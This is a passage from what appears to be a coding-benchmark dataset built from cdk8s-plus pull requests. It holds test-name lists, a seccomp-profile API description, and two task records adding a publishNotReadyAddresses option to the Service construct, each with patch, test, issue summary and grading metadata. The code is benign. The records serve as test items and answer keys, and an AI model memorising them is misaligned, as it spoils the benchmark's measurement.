imported", "minimal definition", "secrets can be added to the service account", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added" ]
Enum: SeccompProfileType Location: src/container.ts Inputs: No runtime inputs (enum values are compile‑time constants) Outputs: Values ‑ LOCALHOST = 'Localhost', RUNTIME_DEFAULT = 'RuntimeDefault', UNCONFINED = 'Unconfined' Description: Enumerates the allowed seccomp profile sources for a container. Used when constructing a SeccompProfile to indicate which profile type to apply. Interface: SeccompProfile Location: src/container.ts Inputs:   type: SeccompProfileType (required) – the kind of seccomp profile to apply.<br>   localhostProfile?: string (optional) – path to a localhost‑based profile; must be provided only when type is SeccompProfileType.LOCALHOST. Outputs: An object describing the container’s seccomp configuration; validated by ContainerSecurityContext constructor. Description: Represents the seccomp settings that can be attached to a container’s security context. The constructor enforces that localhostProfile is only supplied when type is LOCALHOST. Property: ContainerSecurityContext.seccompProfile Location: src/container.ts (class ContainerSecurityContext) Inputs: props.seccompProfile?: SeccompProfile (optional) – passed via ContainerSecurityContextProps. Outputs: this.seccompProfile?: SeccompProfile – stored on the instance and emitted in the rendered Kubernetes spec. Description: Holds the seccomp profile configuration for a container. When a Container is created with a securityContext containing a seccompProfile, this property is populated; if localhostProfile is set with a non‑LOCALHOST type, the constructor throws an error (“localhostProfile must only be set if type is \"Localhost\"”). Constructor Validation (inside ContainerSecurityContext) Location: src/container.ts (constructor) Inputs: props.seccompProfile?.type, props.seccompProfile?.localhostProfile Outputs: May throw Error with message 'localhostProfile must only be set if type is "Localhost"' Description: Ensures that the seccompProfile object is consistent: a localhostProfile can only be specified when the type is SeccompProfileType.LOCALHOST. This validation is exercised by the test that expects an exception for an invalid combination.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 44, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch", "backport-to-k8s-29/main: Backport a PR to the k8s-30 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#seccompprofile-v1-core" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding SeccompProfile support to the container security context, including enum definitions, validation, and serialization. The provided test patch checks default and custom contexts, and enforces that localhostProfile is only allowed with type Localhost, matching the intended behavior. No test misalignments or missing specifications are observed, and the external URL is merely a reference, not a required source of truth. Therefore the task is well‑specified and solvable, qualifying as an A‑type task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
b3399e27a1de60ed09d1a9e43e3ad625369918c8
2024-08-08 11:55:27
cdk8s-team__cdk8s-plus-4500
diff --git a/src/service.ts b/src/service.ts index 871ab86b..27bb6a5f 100644 --- a/src/service.ts +++ b/src/service.ts @@ -94,6 +94,16 @@ export interface ServiceProps extends base.ResourceProps { */ readonly loadBalancerSourceRanges?: string[]; + /** + * The publishNotReadyAddresses indicates that any agent which deals with endpoints for this Service + * should disregard any indications of ready/not-ready + * + * More info: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#servicespec-v1-core + * + * @default - false + */ + readonly publishNotReadyAddresses?: boolean; + } /** @@ -210,6 +220,7 @@ export class Service extends base.Resource { private readonly _selector: Record<string, string>; private readonly _ports: ServicePort[]; private readonly _loadBalancerSourceRanges?: string[]; + private readonly _publishNotReadyAddresses?: boolean; constructor(scope: Construct, id: string, props: ServiceProps = {}) { super(scope, id); @@ -232,6 +243,7 @@ export class Service extends base.Resource { this._ports = []; this._selector = { }; this._loadBalancerSourceRanges = props.loadBalancerSourceRanges; + this._publishNotReadyAddresses = props.publishNotReadyAddresses; if (props.selector) { this.select(props.selector); @@ -337,6 +349,7 @@ export class Service extends base.Resource { selector: this._selector, ports: ports, loadBalancerSourceRanges: this._loadBalancerSourceRanges, + publishNotReadyAddresses: this._publishNotReadyAddresses, } : { type: this.type, externalName: this.externalName,
feat(service): support `publishNotReadyAddresses` add support for publishNotReadyAddresses. for more info: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#servicespec-v1-core this should be backported to 1.29 and 1.28 main branches
**Title** Add support for the `publishNotReadyAddresses` option on Service resources **Problem** Creating a Service did not allow callers to control whether endpoints that are not yet ready should be published. This limitation prevented users from configuring services that need to expose pods before they become ready, a feature available in recent Kubernetes API versions. **Root Cause** The Service abstraction omitted the `publishNotReadyAddresses` field from its specification, so the generated manifests never included the corresponding flag. **Fix / Expected Behavior** - Introduce an optional boolean flag in the Service configuration API to control `publishNotReadyAddresses`. - Store the flag internally when provided. - Include the flag in the rendered Service manifest only when set, preserving the default behavior of not publishing not‑ready addresses. - Ensure the default remains false, matching Kubernetes semantics. - Maintain compatibility with existing code that does not set the flag. **Risk & Validation** - Verify that existing services generate identical manifests when the new flag is omitted. - Add tests to confirm that setting the flag results in the correct property appearing in the output manifest. - Run integration checks against the supported Kubernetes versions (1.28‑1.30) to ensure the manifest remains valid.
4,500
cdk8s-team/cdk8s-plus
diff --git a/test/service.test.ts b/test/service.test.ts index 48083e87..106de6bf 100644 --- a/test/service.test.ts +++ b/test/service.test.ts @@ -185,3 +185,14 @@ test('can be exposed by an ingress', () => { const ingress = Testing.synth(chart)[1]; expect(ingress).toMatchSnapshot(); }); + +test('can set publishNotReadyAddresses', () => { + const chart = Testing.chart(); + new kplus.Service(chart, 'service', { + ports: [{ port: 80 }], + publishNotReadyAddresses: true, + }); + + const spec = Testing.synth(chart)[0].spec; + expect(spec.publishNotReadyAddresses).toBeTruthy(); +});
[ "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses" ]
[ "defaultChild", "default configuration", "custom configuration", "Can be isolated", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "can select namespaces", "can select all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "fromCommand", "fromHttpGet", "fromTcpSocket", "Can mutate metadata", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Service.constructor(scope: Construct, id: string, props: ServiceProps) Location: src/service.ts Inputs: - **scope** – Construct in which the Service will be defined. - **id** – Unique identifier for the Service construct. - **props** – ServiceProps object; may include the optional boolean **publishNotReadyAddresses** (default false) that indicates endpoints should be published even when not ready. Outputs: Returns a Service instance; during synthesis the generated Service manifest includes `spec.publishNotReadyAddresses` set to the value supplied in props. Description: Constructs a Kubernetes Service; the newly added `publishNotReadyAddresses` flag allows callers (as exercised in the tests) to control whether the Service should expose not‑ready endpoints.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 13, "pr_author": "serhatcetinkaya", "pr_labels": [ "backport-to-k8s-28/main: Backport a PR to the k8s-28 branch", "backport-to-k8s-29/main: Backport a PR to the k8s-30 branch" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#servicespec-v1-core" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a publishNotReadyAddresses option to Service, providing a Kubernetes doc URL for reference. The test verifies that setting this flag results in the spec containing publishNotReadyAddresses true, which directly matches the stated requirement. There are no mismatches, external dependencies required for correctness, or ambiguous specifications. Hence the task is clearly defined and test-aligned, qualifying as SOLVABLE (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
52f2dc56533098c969c1d9338f1bf6301051b41a
2024-08-12 08:51:11
cdk8s-team__cdk8s-plus-4510
diff --git a/src/service.ts b/src/service.ts index 871ab86b..27bb6a5f 100644 --- a/src/service.ts +++ b/src/service.ts @@ -94,6 +94,16 @@ export interface ServiceProps extends base.ResourceProps { */ readonly loadBalancerSourceRanges?: string[]; + /** + * The publishNotReadyAddresses indicates that any agent which deals with endpoints for this Service + * should disregard any indications of ready/not-ready + * + * More info: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.30/#servicespec-v1-core + * + * @default - false + */ + readonly publishNotReadyAddresses?: boolean; + } /** @@ -210,6 +220,7 @@ export class Service extends base.Resource { private readonly _selector: Record<string, string>; private readonly _ports: ServicePort[]; private readonly _loadBalancerSourceRanges?: string[]; + private readonly _publishNotReadyAddresses?: boolean; constructor(scope: Construct, id: string, props: ServiceProps = {}) { super(scope, id); @@ -232,6 +243,7 @@ export class Service extends base.Resource { this._ports = []; this._selector = { }; this._loadBalancerSourceRanges = props.loadBalancerSourceRanges; + this._publishNotReadyAddresses = props.publishNotReadyAddresses; if (props.selector) { this.select(props.selector); @@ -337,6 +349,7 @@ export class Service extends base.Resource { selector: this._selector, ports: ports, loadBalancerSourceRanges: this._loadBalancerSourceRanges, + publishNotReadyAddresses: this._publishNotReadyAddresses, } : { type: this.type, externalName: this.externalName,
feat(service): support `publishNotReadyAddresses` (#4500) # Backport This will backport the following commits from `k8s-30/main` to `k8s-28/main`: - [feat(service): support `publishNotReadyAddresses` (#4500)](https://github.com/cdk8s-team/cdk8s-plus/pull/4500) <!--- Backport version: 8.9.9 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add support for `publishNotReadyAddresses` on Service resources **Problem** Consumers need the ability to expose endpoints of pods that are not yet marked ready. The Service construct previously lacked a way to configure this behavior, limiting use‑cases that rely on early traffic routing or mesh integrations. **Root Cause** The Service spec field `publishNotReadyAddresses` was not exposed in the construct’s API, so the generated manifests always omitted it. **Fix / Expected Behavior** - Introduce an optional boolean flag in the Service properties to control `publishNotReadyAddresses`. - Store the flag internally when a Service is instantiated. - Include the flag in the rendered Service manifest when set, defaulting to false when omitted. - Preserve existing behavior for all other Service configuration options. **Risk & Validation** - Verify that the new property does not interfere with existing Service types or selector logic. - Ensure generated manifests correctly reflect the flag only when explicitly enabled. - Run the full test suite and add a regression test confirming the field appears with the expected value.
4,510
cdk8s-team/cdk8s-plus
diff --git a/test/service.test.ts b/test/service.test.ts index 48083e87..106de6bf 100644 --- a/test/service.test.ts +++ b/test/service.test.ts @@ -185,3 +185,14 @@ test('can be exposed by an ingress', () => { const ingress = Testing.synth(chart)[1]; expect(ingress).toMatchSnapshot(); }); + +test('can set publishNotReadyAddresses', () => { + const chart = Testing.chart(); + new kplus.Service(chart, 'service', { + ports: [{ port: 80 }], + publishNotReadyAddresses: true, + }); + + const spec = Testing.synth(chart)[0].spec; + expect(spec.publishNotReadyAddresses).toBeTruthy(); +});
[ "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses" ]
[ "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can be isolated", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "fromCommand", "fromHttpGet", "fromTcpSocket", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "can select namespaces", "can select all namespaces", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default configuration", "custom configuration", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", 